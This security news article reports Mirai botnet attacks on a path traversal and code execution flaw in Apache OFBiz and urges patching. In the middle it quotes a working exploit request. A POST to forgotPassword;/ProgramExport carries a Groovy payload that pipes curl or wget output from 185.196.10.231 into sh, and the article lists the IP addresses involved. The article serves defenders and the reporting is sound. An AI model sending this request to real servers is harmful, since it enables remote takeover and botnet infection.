Wednesday, November 6, 2024
HomeBotnetMirai Botnet Attacking Apache OFBiz Directory Traversal Vulnerability

Mirai Botnet Attacking Apache OFBiz Directory Traversal Vulnerability

Published on

Malware protection

The notorious Mirai botnet has been observed exploiting a recently disclosed directory traversal vulnerability in Apache OFBiz.

This Java-based framework, supported by the Apache Foundation, is used for creating ERP (Enterprise Resource Planning) applications, which are critical for managing sensitive business data despite being less prevalent than commercial alternatives.

Vulnerability Details and Exploitation

According to the SANS reports, the vulnerability, patched in May 2024, affects OFBiz versions before 18.12.13. It allows remote command execution through a path traversal exploit.

- Advertisement - SIEM as a Service

How to Build a Security Framework With Limited Resources IT Security Team (PDF) - Free Guide

The flaw can be triggered by appending a semicolon to a URL, followed by a restricted URL. For instance, the URL /webtools/control/forgotPassword;/ProgramExport can be exploited, as “forgotPassword” does not require authentication and “ProgramExport” permits arbitrary code execution.

An attacker can exploit this vulnerability using a POST request with a URL parameter or a request body. Recent attacks have been observed using the following exploit:

POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl http://95.214.27.196/where/bin.sh
  • User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
  • Host: [victim IP address]
  • Accept: /
  • Upgrade-Insecure-Requests: 1
  • Connection: keep-alive
  • Content-Type: application/x-www-form-urlencoded
  • Content-Length: 147
  • groovyProgram=throw+new+Exception(‘curl http://185.196.10.231/sh | sh -s ofbiz || wget -O- http://185.196.10.231/sh | sh -s ofbiz’.execute().text);

Mirai Botnet Activity

report
report

The IP addresses 95.214.27.196 and 185.196.10.231 have been identified as hosting and distributing malware, while 83.222.191.62 has been sending exploits in the request body.

These IPs have been actively scanning and exploiting the OFBiz vulnerability, with the IP 185.196.10.231 previously involved in scanning for IoT vulnerabilities.

Since the vulnerability details were made public, there has been a significant increase in scans targeting OFBiz, peaking at nearly 2000 scans daily. This surge indicates that attackers are actively experimenting with and potentially incorporating this vulnerability into botnets like Mirai.

Organizations using Apache OFBiz must urgently apply the latest security updates to mitigate this critical vulnerability.

The rapid exploitation by the Mirai botnet underscores the importance of timely patching and vigilant monitoring to protect sensitive business data from cyber threats.

Are you from SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Free Access

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

Azure API Management Vulnerabilities Let Attackers Escalate Privileges

Recent discoveries by Binary Security have revealed critical vulnerabilities in Azure API Management (APIM) that could...

Google Patches High-Severity Vulnerabilities in Chrome

Google has released a new update for its Chrome browser, addressing two high-severity vulnerabilities....

ClickFix Exploits GMeet & Zoom Pages to Deliver Sophisticated Malware

A new tactic, "ClickFix," has emerged. It exploits fake Google Meet and Zoom pages...

APT36 Hackers Attacking Windows Deevices With ElizaRAT

APT36, a sophisticated threat actor, has been actively targeting Indian entities with advanced malware...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

Azure API Management Vulnerabilities Let Attackers Escalate Privileges

Recent discoveries by Binary Security have revealed critical vulnerabilities in Azure API Management (APIM) that could...

Google Patches High-Severity Vulnerabilities in Chrome

Google has released a new update for its Chrome browser, addressing two high-severity vulnerabilities....

ClickFix Exploits GMeet & Zoom Pages to Deliver Sophisticated Malware

A new tactic, "ClickFix," has emerged. It exploits fake Google Meet and Zoom pages...